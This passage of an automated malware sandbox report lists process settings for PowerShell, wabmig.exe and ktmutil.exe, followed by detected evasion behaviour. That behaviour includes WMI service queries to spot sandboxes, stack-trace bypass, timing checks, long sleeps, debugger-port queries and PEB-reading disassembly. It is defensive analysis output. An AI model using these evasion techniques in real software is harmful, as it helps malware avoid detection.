          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\ktmutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\ktmutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\ktmutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\ktmutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\ktmutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
          Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Service
          Switches to a custom stack to bypass stack traces
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeAPI/Special instruction interceptor: Address: 477D0E8
          Source: C:\Windows\SysWOW64\ktmutil.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
          Source: C:\Windows\SysWOW64\ktmutil.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
          Source: C:\Windows\SysWOW64\ktmutil.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
          Source: C:\Windows\SysWOW64\ktmutil.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
          Source: C:\Windows\SysWOW64\ktmutil.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
          Source: C:\Windows\SysWOW64\ktmutil.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
          Source: C:\Windows\SysWOW64\ktmutil.exeAPI/Special instruction interceptor: Address: 7FFE22210154
          Source: C:\Windows\SysWOW64\ktmutil.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219B096E rdtsc 10_2_219B096E
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7278Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2575Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7064Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2709Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeWindow / User API: threadDelayed 673Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeAPI coverage: 0.4 %
          Source: C:\Windows\SysWOW64\ktmutil.exeAPI coverage: 3.1 %
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7652Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7992Thread sleep count: 7064 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7980Thread sleep count: 2709 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8092Thread sleep time: -6456360425798339s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 2720Thread sleep count: 673 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\ktmutil.exe TID: 3992Thread sleep time: -40000s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe TID: 7504Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\ktmutil.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\ktmutil.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_003AC270 FindFirstFileW,FindNextFileW,FindClose,12_2_003AC270
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: wscript.exe, 00000000.00000003.1720426284.000001C4CB4A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e Virtualization ServiceRemote Desktop Services UserMode Port RedirectorUPnP Device HostUser ManagerUpdate Orchestrator ServiceVolumetric Audio Compositor ServiceCredential ManagerVirtual DiskHyper-V Guest Service InterfacevmicheartbeatHyper-V Data Exchange ServiceHyper-V Remote Desktop Virtualization ServicevmicshutdownHyper-V Time Synchronization ServiceHyper-V PowerShell Direct ServicevmicvssVolume Shadow CopyWindows TimeWalletServiceWarpJITSvcBlock Level Backup Engine ServiceWindows Biometric ServiceWindows Connection ManagerWindows Connect Now - Config RegistrarDiagnostic Service HostDiagnostic System HostMicrosoft Defender Antivirus Network Inspection ServiceWebClientWindows Event CollectorWindows Encryption Provider Host ServiceProblem Reports Control Panel SupportWindows Error Reporting ServiceWi-Fi Direct Services Connection Manager ServiceStill Image Acquisition EventsMicrosoft Defender Antivirus ServiceWinHTTP Web Proxy Auto-Discovery ServiceWindows Management InstrumentationWindows Remote Management (WS-Management)Windows Insider ServiceWLAN AutoConfigMicrosoft Account Sign-in AssistantLocal Profile Assistant ServiceWindows Management ServiceWMI Performance AdapterWindows Media Player Network Sharing ServiceWork FoldersParental ControlsPortable Device Enumerator ServiceWindows Push Notifications System ServiceSecurity CenterWindows SearchWindows UpdateWWAN AutoConfigXbox Live Auth ManagerXbox Live Game SaveXbox Accessory Management ServiceXbox Live Networking ServiceAgent Activation Runtime_26d39GameDVR and Broadcast User Service_26d39Bluetooth User Support Service_26d39CaptureService_26d39Clipboard User Service_26d39Connected Devices Platform User Service_26d39ConsentUX_26d39CredentialEnrollmentManagerUserSvc_26d39DeviceAssociationBroker_26d39DevicePicker_26d39DevicesFlow_26d39MessagingService_26d39Sync Host_26d39Contact Data_26d39PrintWorkflow_26d39iagnH
          Source: wabmig.exe, 0000000A.00000002.2434620654.0000000005E08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(\
          Source: powershell.exe, 00000006.00000002.2221760380.00000000075D5000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000003.2332669615.0000000005E5F000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000002.2434687494.0000000005E5F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: wabmig.exe, 0000000A.00000003.2332669615.0000000005E5F000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000002.2434687494.0000000005E5F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW"
          Source: ktmutil.exe, 0000000C.00000002.2980525001.0000000000813000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: powershell.exe, 00000001.00000002.2402315774.000001F2B7850000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!!
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\ktmutil.exeProcess queried: DebugPortJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219B096E rdtsc 10_2_219B096E
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0479D41C LdrInitializeThunk,6_2_0479D41C
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219F019F mov eax, dword ptr fs:[00000030h]10_2_219F019F
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219F019F mov eax, dword ptr fs:[00000030h]10_2_219F019F
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219F019F mov eax, dword ptr fs:[00000030h]10_2_219F019F
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219F019F mov eax, dword ptr fs:[00000030h]10_2_219F019F
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196A197 mov eax, dword ptr fs:[00000030h]10_2_2196A197
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196A197 mov eax, dword ptr fs:[00000030h]10_2_2196A197
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196A197 mov eax, dword ptr fs:[00000030h]10_2_2196A197
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A211A4 mov eax, dword ptr fs:[00000030h]10_2_21A211A4
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A211A4 mov eax, dword ptr fs:[00000030h]10_2_21A211A4
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A211A4 mov eax, dword ptr fs:[00000030h]10_2_21A211A4
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A211A4 mov eax, dword ptr fs:[00000030h]10_2_21A211A4
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219B0185 mov eax, dword ptr fs:[00000030h]10_2_219B0185
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2198B1B0 mov eax, dword ptr fs:[00000030h]10_2_2198B1B0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A2C188 mov eax, dword ptr fs:[00000030h]10_2_21A2C188
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A2C188 mov eax, dword ptr fs:[00000030h]10_2_21A2C188
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A461E5 mov eax, dword ptr fs:[00000030h]10_2_21A461E5
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219AD1D0 mov eax, dword ptr fs:[00000030h]10_2_219AD1D0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219AD1D0 mov ecx, dword ptr fs:[00000030h]10_2_219AD1D0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A361C3 mov eax, dword ptr fs:[00000030h]10_2_21A361C3
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A361C3 mov eax, dword ptr fs:[00000030h]10_2_21A361C3
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219A01F8 mov eax, dword ptr fs:[00000030h]10_2_219A01F8
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A451CB mov eax, dword ptr fs:[00000030h]10_2_21A451CB
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219951EF mov eax, dword ptr fs:[00000030h]10_2_219951EF
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219951EF mov eax, dword ptr fs:[00000030h]10_2_219951EF
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219951EF mov eax, dword ptr fs:[00000030h]10_2_219951EF
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219951EF mov eax, dword ptr fs:[00000030h]10_2_219951EF
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219951EF mov eax, dword ptr fs:[00000030h]10_2_219951EF
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219951EF mov eax, dword ptr fs:[00000030h]10_2_219951EF
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219951EF mov eax, dword ptr fs:[00000030h]10_2_219951EF
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219951EF mov eax, dword ptr fs:[00000030h]10_2_219951EF
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219951EF mov eax, dword ptr fs:[00000030h]10_2_219951EF
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219951EF mov eax, dword ptr fs:[00000030h]10_2_219951EF
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219951EF mov eax, dword ptr fs:[00000030h]10_2_219951EF
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219951EF mov eax, dword ptr fs:[00000030h]10_2_219951EF
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219951EF mov eax, dword ptr fs:[00000030h]10_2_219951EF
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219751ED mov eax, dword ptr fs:[00000030h]10_2_219751ED
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196B136 mov eax, dword ptr fs:[00000030h]10_2_2196B136
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196B136 mov eax, dword ptr fs:[00000030h]10_2_2196B136
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196B136 mov eax, dword ptr fs:[00000030h]10_2_2196B136
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196B136 mov eax, dword ptr fs:[00000030h]10_2_2196B136
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21971131 mov eax, dword ptr fs:[00000030h]10_2_21971131
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21971131 mov eax, dword ptr fs:[00000030h]10_2_21971131
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A30115 mov eax, dword ptr fs:[00000030h]10_2_21A30115
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A1A118 mov ecx, dword ptr fs:[00000030h]10_2_21A1A118
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A1A118 mov eax, dword ptr fs:[00000030h]10_2_21A1A118
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A1A118 mov eax, dword ptr fs:[00000030h]10_2_21A1A118
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A1A118 mov eax, dword ptr fs:[00000030h]10_2_21A1A118
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219A0124 mov eax, dword ptr fs:[00000030h]10_2_219A0124
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196C156 mov eax, dword ptr fs:[00000030h]10_2_2196C156
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21976154 mov eax, dword ptr fs:[00000030h]10_2_21976154
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21976154 mov eax, dword ptr fs:[00000030h]10_2_21976154
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21977152 mov eax, dword ptr fs:[00000030h]10_2_21977152
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A09179 mov eax, dword ptr fs:[00000030h]10_2_21A09179
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21969148 mov eax, dword ptr fs:[00000030h]10_2_21969148
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21969148 mov eax, dword ptr fs:[00000030h]10_2_21969148
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21969148 mov eax, dword ptr fs:[00000030h]10_2_21969148
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21969148 mov eax, dword ptr fs:[00000030h]10_2_21969148
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196F172 mov eax, dword ptr fs:[00000030h]10_2_2196F172
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196F172 mov eax, dword ptr fs:[00000030h]10_2_2196F172
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196F172 mov eax, dword ptr fs:[00000030h]10_2_2196F172
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196F172 mov eax, dword ptr fs:[00000030h]10_2_2196F172
